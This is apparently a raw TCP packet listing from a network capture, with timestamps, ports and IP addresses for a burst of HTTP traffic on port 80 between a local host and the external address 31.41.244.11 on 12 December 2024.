Dec 12, 2024 16:48:37.878442049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.878523111 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.879470110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.879476070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.879533052 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.880537987 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.880546093 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.880589008 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.881551027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.881557941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.881627083 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.882567883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.882610083 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.882632017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.882690907 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.883685112 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.883691072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.883738041 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.884744883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.884802103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.884841919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.885742903 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.885812044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.022088051 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.022098064 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.022190094 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.022490978 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.022497892 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.022537947 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.023564100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.023570061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.023607969 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.024595022 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.024601936 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.024647951 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.025640011 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.025648117 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.025710106 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.026716948 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.026724100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.026762009 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.027739048 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.027754068 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.027784109 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.028948069 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.028956890 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.029000044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.029912949 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.029921055 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.029958010 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.031104088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.031111956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.031152010 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.032025099 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.032038927 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.032077074 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.033060074 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.033068895 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.033116102 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.034298897 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.034307957 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.034348965 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.035254002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.035263062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.035300970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.036323071 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.036339045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.036377907 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.037467957 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.037486076 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.037529945 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.038455009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.038463116 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.038501978 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.039581060 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.039588928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.039629936 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.040587902 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.040601969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.040633917 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.041564941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.042222977 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.042601109 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.042608976 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.042654991 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.043623924 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.043797016 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.043808937 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.043842077 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.043869972 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.044909000 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.044925928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.044960022 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.045949936 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.045957088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.045994997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.047049999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.047063112 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.047096014 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.048072100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.048079967 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.048118114 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.049215078 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.049222946 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.049258947 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.050259113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.050266027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.050299883 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.051295042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.051301956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.051336050 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.052495003 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.052501917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.052542925 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.053401947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.053411007 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.053457975 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.054538965 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.054546118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.054606915 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.055511951 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.055519104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.055558920 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.056587934 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.056600094 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.056642056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.057722092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.057739973 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.057791948 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.058845997 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.058854103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.058891058 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.059968948 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.059979916 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.060014009 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.060902119 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.061083078 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.061085939 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.061728954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.062011003 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.062016964 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.062058926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.063054085 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.063060045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.063101053 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.064136028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.064147949 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.064191103 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.065175056 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.065186024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.065226078 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.066282988 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.066289902 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.066325903 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.067364931 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.067370892 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.067409992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.068449020 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.068674088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.068716049 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.069351912 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.069479942 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.069514990 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.070528984 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.070535898 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.070574999 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.071636915 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.072550058 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.072556019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.072618961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.072777033 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.073784113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.073790073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.073834896 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.074727058 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.075495005 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.075542927 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.075881004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.075886965 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.075928926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.076991081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.076997042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.077033043 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.078068972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.079631090 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.215517044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.215631008 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.215714931 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.215944052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.216094017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.216126919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.216150999 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.216861010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.216867924 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.216924906 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.217957020 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.218002081 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.218115091 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.218164921 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.219141006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.219149113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.219186068 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.220066071 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.220112085 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.220182896 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.220254898 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.221261024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.221266985 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.221318007 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.222357035 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.222450018 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.222553968 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.222682953 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.223711014 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.223717928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.223757029 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.224587917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.224596977 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.224633932 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.225508928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.225635052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.225677967 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.226490021 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.226567030 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.226577044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.226599932 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.227456093 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.227463961 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.227511883 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.228722095 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.228729010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.228773117 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.229827881 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.229837894 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.229892969 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.230617046 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.230668068 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.230710983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.230866909 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.231628895 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.231673002 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.231775999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.231822014 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.232690096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.232839108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.232902050 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.233912945 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.234070063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.234261036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.235151052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.235161066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.235214949 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.236114979 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.236123085 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.236171961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.237080097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.237139940 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.237175941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.237215042 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.238256931 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.238555908 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.238584042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.238672018 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.239367962 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.239379883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.239456892 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.240407944 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.240418911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.240478992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.241408110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.241578102 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.241638899 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.242311954 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.242322922 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.242374897 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.243655920 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.243668079 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.243716002 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.244693041 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.244708061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.244744062 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.245589972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.245834112 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.245851994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.245933056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.246874094 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.247323990 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.247359991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.247410059 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.247958899 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.247971058 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.248011112 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.249089956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.249098063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.249157906 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.250112057 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.250119925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.250168085 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.250701904 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.250719070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.250756979 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.251090050 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.251146078 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.251197100 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.251214981 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.254448891 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.254556894 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.254772902 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.254842997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.255207062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.255219936 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.255245924 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.255259991 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.255688906 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.255695105 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.255738974 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.256237030 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.256244898 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.256283998 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.257519960 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.257534027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.257565022 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.258492947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.258506060 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.258536100 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.258579969 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.258691072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.258778095 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.258779049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.258845091 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.259643078 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.260246992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.260653973 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.260668039 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.260710001 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.260977983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.261801004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.261851072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.261858940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.261898041 CET	49931	80	192.168.2.10	31.41.244.11
